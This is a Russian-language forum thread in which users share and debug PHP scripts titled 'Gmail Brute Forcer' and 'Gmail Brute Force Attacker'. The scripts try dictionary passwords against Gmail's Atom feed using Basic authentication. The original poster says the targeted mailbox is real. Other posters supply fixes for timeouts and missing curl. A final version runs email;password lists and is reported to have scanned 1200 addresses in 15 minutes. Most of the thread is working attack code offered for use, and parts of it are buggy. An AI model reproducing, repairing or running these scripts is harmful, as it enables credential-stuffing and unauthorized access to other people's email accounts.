Подскажите новичку, как правильно настроить и запустить этот код: PHP: <?php // LARIKA Gmail Brute Forcer $dict = ""; // Your dictionary file here $username = ""; // Your username here $proxy = ""; // Your proxy here $port = ""; // Your proxy port here $headers = array( "Host: mail.google.com", "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language: en-us,en;q=0.5", "Accept-Encoding: text", # No gzip, it only clutters your code! "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Date: ".date(DATE_RFC822) ); $c = curl_init('https://mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_PROXY, $proxy); curl_setopt($c, CURLOPT_PROXYPORT, $port); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $wrong = curl_exec($c); // Get it curl_close($c); // Close the curl stream foreach(file($dict) as $line) { $word = str_replace("\r\n", "", $line); if(check_correct($username, $word, $wrong)) { die("Found the password : ".$word.""); } } // Function for checking whether the username and password are correct function check_correct($username, $password, $wrong) { $headers1 = array( "Host: gmail.google.com", "Authorization: Basic ".base64_encode($username.':'.$password), "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language: en-gb,en;q=0.5", "Accept-Encoding: text", "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Date: ".date(DATE_RFC822) ); $c = curl_init('https://gmail.google.com/gmail/feed/atom'); curl_setopt($c, CURLOPT_PROXY, $proxy); curl_setopt($c, CURLOPT_PROXYPORT, $port); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); curl_setopt($c, CURLOPT_COOKIESESSION, true); curl_setopt($c, CURLOPT_HTTPHEADER, $headers1); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); $str = curl_exec($c); curl_close($c); print $str; // for debug if($str != $wrong) {return true;} else {return false;} } ?> После запуска, на странице выскакивает сообщение: Fatal error: Call to undefined function curl_init() in /home/tu2.ru/n/ni/nic/htdocs/test/index.php on line 20 Может быть не правильно заполняю: $dict = "pass.txt" $username = "klgdfs" $proxy = "212.49.116.186" $port = "80" pass.txt положил туда же, куда и php-файл. мыло реальное, прокси рабочее...
Переложил на хостинг с поддержкой curl - ваще ничего не работает. Всё зависает и ошибок не выдает, хотя правильный пароль находится в третьей строчке списка pass.txt
RESPECТ Попробовал на Денвере другой код (см. ниже). Вроде бы работает, но через 30 секунд перебора вываливается вот эта хрень: Fatal error: Maximum execution time of 30 seconds exceeded in Z:\home\test1.ru\www\index.php on line 173 Неужели ещё никто не сделал рабочий брут для gmail? Уже неделю по всему инету ищу и ничего путного найти не могу. Странно как-то и печально. PHP: <?php ////////////////////// ////Gmail-Brute////// ////////////////// //////////////////////// # This script was created to Brute Force G-Mail Logins,# #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) # //////////////////////// $dic ="pass.txt"; /////////////////////// echo " <title>Gmail Brute Force Attacker</title> </head> <style type='text/css'> body { font:Verdana, Arial, Helvetica, sans-serif; font-size:12px; border-color:#FFFFFF; } .raster_table { background-color:#444444; border-color:#CCCCCC; } .alert { color:#FF0000; } </style> <body> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Gmail Brute Force Attacker</b></div> </td> </tr> </table> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> <form method='post'> Username to brute:<br> <input name='username' type='text' /><br><br> <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br> </form> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> </table> "; // Sets variables and retrives google error for comparing if(isset($_POST['attack']) && isset($_POST['username'])) { $username = $_POST['username']; $headers = array( "Host: mail.google.com", "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language: en-us,en;q=0.5", "Accept-Encoding: text", # No gzip, it only clutters your code! "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Date: ".date(DATE_RFC822) ); $c = curl_init('https://mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $wrong = curl_exec($c); // Get it curl_close($c); // Close the curl stream } //Dictionary Attack if($_POST['attack'] == "dictionary") { $Dictionary = file("$dic"); for ($Position = 0; $Position < count($Dictionary); $Position++) { $Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]); if(check_correct($username, $Dictionary[$Position])) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar y attack.</b></div> </td> </tr> </table>"; } //Brute Attack elseif($_POST['attack'] == "brute") { for ($Pass = 0; $Pass < 2; $Pass++) { if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } if(check_correct($username, $Pass)) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for ce attack.</b></div> </td> </tr> </table>"; } echo "</body> </html>"; // Function for checking whether the username and password are correct function check_correct($username, $password) { global $wrong, $headers; $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $str = curl_exec($c); // Get it curl_close($c); if($str != $wrong) {return true;} else {return false;} } ?>
добавь в начало кода set_time_limit(0); брутов полно, только нужно немного мозга иметь чтобы запустить их
Fatal error: Maximum execution time of 30 seconds exceeded Добавь: <?php ini_set("max_execution_time", "60"); ?> или <?php set_time_limit (60); ?> или же положи в корень сайта файл .htaccess следующего содержания: php_value max_execution_time 60
Какие детские вопросы. Прежде че то запускать ,надо разобратся как это работает! То курла нет, то время истекло...
Оч смешно. Специально не сказали, что это просто gmail забанил? Можно подумать, вы родились с клавиатурой в руках.
Подправил, чтоб перебирал по списку email;pass, просканил 1200 адресов минут за 15 PHP: <?php ////////////////////// ////Gmail-Brute////// ////////////////// //////////////////////// # This script was created to Brute Force G-Mail Logins,# #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) # //////////////////////// $dic ="pass.txt"; set_time_limit(0); /////////////////////// echo " <title>Gmail Brute Force Attacker</title> </head> <style type='text/css'> body { font:Verdana, Arial, Helvetica, sans-serif; font-size:12px; border-color:#FFFFFF; } .raster_table { background-color:#444444; border-color:#CCCCCC; } .alert { color:#FF0000; } </style> <body> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Gmail Brute Force Attacker</b></div> </td> </tr> </table> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> <form method='post'> Username to brute:<br> <input name='username' type='text' /><br><br> <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br> </form> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> </table> "; // Sets variables and retrives google error for comparing if(isset($_POST['attack']) && isset($_POST['username'])) { $username = $_POST['username']; $headers = array( "Host: mail.google.com", "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language: en-us,en;q=0.5", "Accept-Encoding: text", # No gzip, it only clutters your code! "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Date: ".date(DATE_RFC822) ); $c = curl_init('https://mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $wrong = curl_exec($c); // Get it curl_close($c); // Close the curl stream } //Dictionary Attack if($_POST['attack'] == "dictionary") { $Dictionary = fopen($dic, "r"); do { $line = fgets($Dictionary); $line = str_replace("\r\n", "", $line); $pair = explode(";", $line); $login = explode("@", $pair[0]); if(check_correct($login[0], $pair[1])) { print("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><font color='green'><b>".$login[0]."@".$login[1].";".$pair[1]."</b></font></div> </td> </tr> </table> </body> </html>"); } } while (!feof($Dictionary)); echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$login[0]."</span> during the dictionar y attack.</b></div> </td> </tr> </table>"; } //Brute Attack elseif($_POST['attack'] == "brute") { for ($Pass = 0; $Pass < 2; $Pass++) { if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } if(check_correct($username, $Pass)) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for ce attack.</b></div> </td> </tr> </table>"; } echo "</body> </html>"; // Function for checking whether the username and password are correct function check_correct($username, $password) { global $wrong, $headers; $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $str = curl_exec($c); // Get it curl_close($c); if($str != $wrong) {return true;} else {return false;} } ?>
